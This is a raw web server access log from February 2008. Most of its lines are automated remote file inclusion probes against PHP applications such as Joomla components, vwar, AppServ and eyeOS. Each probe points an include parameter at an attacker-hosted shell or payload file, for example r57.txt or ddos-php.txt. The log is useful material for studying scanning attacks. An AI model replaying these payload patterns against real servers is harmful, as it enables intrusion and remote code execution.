125.243.64.123 - - [08/Feb/2008:06:16:45 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:06:16:47 -0800] "GET /convert/mvcw.php?vwar_root=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.213 - - [08/Feb/2008:06:16:50 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/phpAdsNew/auctions.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.123.56 - - [08/Feb/2008:06:17:06 -0800] "GET /logs/access_071230.log/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [08/Feb/2008:06:17:06 -0800] "GET /main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [08/Feb/2008:06:17:07 -0800] "GET /logs/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [08/Feb/2008:06:17:10 -0800] "GET /logs/access_080106.log/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.49.246 - - [08/Feb/2008:06:17:29 -0800] "GET /logs/show.php?pagina=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
221.143.49.246 - - [08/Feb/2008:06:17:29 -0800] "GET /show.php?pagina=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.10.158.86 - - [08/Feb/2008:06:18:22 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [08/Feb/2008:06:18:22 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [08/Feb/2008:06:18:22 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.219.10 - - [08/Feb/2008:06:19:19 -0800] "GET /logs/access_080106.log/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [08/Feb/2008:06:19:19 -0800] "GET /main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [08/Feb/2008:06:19:19 -0800] "GET /logs/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [08/Feb/2008:06:19:21 -0800] "GET /logs/access_080122.log/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.80.123.56 - - [08/Feb/2008:06:20:17 -0800] "GET /logs/access_080201.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.218.149.119 - - [08/Feb/2008:06:20:55 -0800] "GET /logs/access_080201.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [08/Feb/2008:06:20:55 -0800] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.218.149.119 - - [08/Feb/2008:06:20:56 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
206.123.86.130 - - [08/Feb/2008:06:21:00 -0800] "GET //vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
206.123.86.130 - - [08/Feb/2008:06:21:00 -0800] "GET /logs//vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.106.18.175 - - [08/Feb/2008:06:21:40 -0800] "GET /logs/access_080106.log/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [08/Feb/2008:06:21:41 -0800] "GET /logs/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [08/Feb/2008:06:21:50 -0800] "GET /logs/access_080122.log/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:06:22:09 -0800] "GET //vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:06:22:09 -0800] "GET /logs//vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.186.92 - - [08/Feb/2008:06:22:20 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.58.186.92 - - [08/Feb/2008:06:22:29 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
81.174.65.31 - - [08/Feb/2008:06:22:58 -0800] "GET /logs/access_080201.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [08/Feb/2008:06:22:59 -0800] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [08/Feb/2008:06:22:59 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.163.200.1 - - [08/Feb/2008:06:23:04 -0800] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:06:23:25 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.186.92 - - [08/Feb/2008:06:24:37 -0800] "GET /file.php?/phpsecurityadmin/include/logout.php?PSA_PATH=http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.58.186.92 - - [08/Feb/2008:06:24:42 -0800] "GET /logs/file.php?/phpsecurityadmin/include/logout.php?PSA_PATH=http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
66.225.219.10 - - [08/Feb/2008:06:24:55 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [08/Feb/2008:06:24:55 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [08/Feb/2008:06:24:55 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.171.48.7 - - [08/Feb/2008:06:25:12 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [08/Feb/2008:06:25:13 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.171.48.7 - - [08/Feb/2008:06:25:13 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.203 - - [08/Feb/2008:06:25:20 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:06:25:26 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.163.200.1 - - [08/Feb/2008:06:25:32 -0800] "GET /logs/access_080201.log//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.163.200.1 - - [08/Feb/2008:06:25:33 -0800] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.163.200.1 - - [08/Feb/2008:06:25:35 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:06:25:52 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.62.200 - - [08/Feb/2008:06:25:53 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.80.123.56 - - [08/Feb/2008:06:25:59 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [08/Feb/2008:06:25:59 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [08/Feb/2008:06:25:59 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:06:26:13 -0800] "GET //vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:06:26:13 -0800] "GET /logs//vwar/admin/?vwar_root=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
64.92.165.114 - - [08/Feb/2008:06:26:14 -0800] "GET /logs/access_080201.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.165.114 - - [08/Feb/2008:06:26:14 -0800] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.92.165.114 - - [08/Feb/2008:06:26:15 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.157.58.25 - - [08/Feb/2008:06:26:32 -0800] "GET /index.php?var=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
207.157.58.25 - - [08/Feb/2008:06:26:45 -0800] "GET /logs/index.php?var=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:26:51 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:26:52 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:26:57 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.188.10 - - [08/Feb/2008:06:27:06 -0800] "GET /index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:27:40 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:27:41 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:27:44 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:27:47 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:27:47 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:27:48 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:27:48 -0800] "GET /logs/access_080108.log/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.169.155.140 - - [08/Feb/2008:06:27:53 -0800] "GET /logs/access.log///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [08/Feb/2008:06:27:53 -0800] "GET ///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [08/Feb/2008:06:27:54 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:27:55 -0800] "GET /ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [08/Feb/2008:06:28:00 -0800] "GET /logs/ipblock.inc.php?path_escape=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.204.41.166 - - [08/Feb/2008:06:28:28 -0800] "GET //editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.h4x0rtools.kit.net/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.18.175 - - [08/Feb/2008:06:28:28 -0800] "GET /logs/access_080201.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.51.176 - - [08/Feb/2008:06:28:55 -0800] "GET /index.php?configFile=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.51.176 - - [08/Feb/2008:06:28:56 -0800] "GET /logs/index.php?configFile=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.197.124.107 - - [08/Feb/2008:06:29:31 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [08/Feb/2008:06:29:31 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [08/Feb/2008:06:29:32 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [08/Feb/2008:06:29:32 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [08/Feb/2008:06:29:33 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [08/Feb/2008:06:29:33 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [08/Feb/2008:06:29:33 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:29:43 -0800] "GET /logs/access_080122.log//appserv/main.php?appserv_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:29:43 -0800] "GET //appserv/main.php?appserv_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:29:44 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.169.155.140 - - [08/Feb/2008:06:29:53 -0800] "GET /logs/access_080122.log///appserv/main.php?appserv_root=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:29:54 -0800] "GET /logs/access_071230.log//appserv/main.php?appserv_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [08/Feb/2008:06:30:17 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [08/Feb/2008:06:30:18 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.175 - - [08/Feb/2008:06:30:19 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.182 - - [08/Feb/2008:06:31:16 -0800] "GET /index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:06:32:01 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:06:32:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:06:32:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.249.0.39 - - [08/Feb/2008:06:32:01 -0800] "GET /logs//eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=http://rafb.net/p/fZZpha10.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.249.0.39 - - [08/Feb/2008:06:32:01 -0800] "GET //eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=http://rafb.net/p/fZZpha10.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
69.57.128.49 - - [08/Feb/2008:06:34:43 -0800] "GET /logs/access_080106.log//index.php?option=com_rsgallery&page=inline&catid=http://www.skibennetts.com/images/banner/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [08/Feb/2008:06:34:44 -0800] "GET //index.php?option=com_rsgallery&page=inline&catid=http://www.skibennetts.com/images/banner/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [08/Feb/2008:06:34:44 -0800] "GET /logs//index.php?option=com_rsgallery&page=inline&catid=http://www.skibennetts.com/images/banner/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:34:55 -0800] "GET /logs/access_071229.log/phpATM/login.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:34:56 -0800] "GET /phpATM/login.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:34:56 -0800] "GET /logs/phpATM/login.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.184.150 - - [08/Feb/2008:06:35:26 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.skibennetts.com/images/banner/ddos-php.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [08/Feb/2008:06:35:26 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.skibennetts.com/images/banner/ddos-php.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [08/Feb/2008:06:35:27 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.skibennetts.com/images/banner/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [08/Feb/2008:06:35:27 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.skibennetts.com/images/banner/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [08/Feb/2008:06:35:27 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.skibennetts.com/images/banner/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [08/Feb/2008:06:35:27 -0800] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.skibennetts.com/images/banner/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
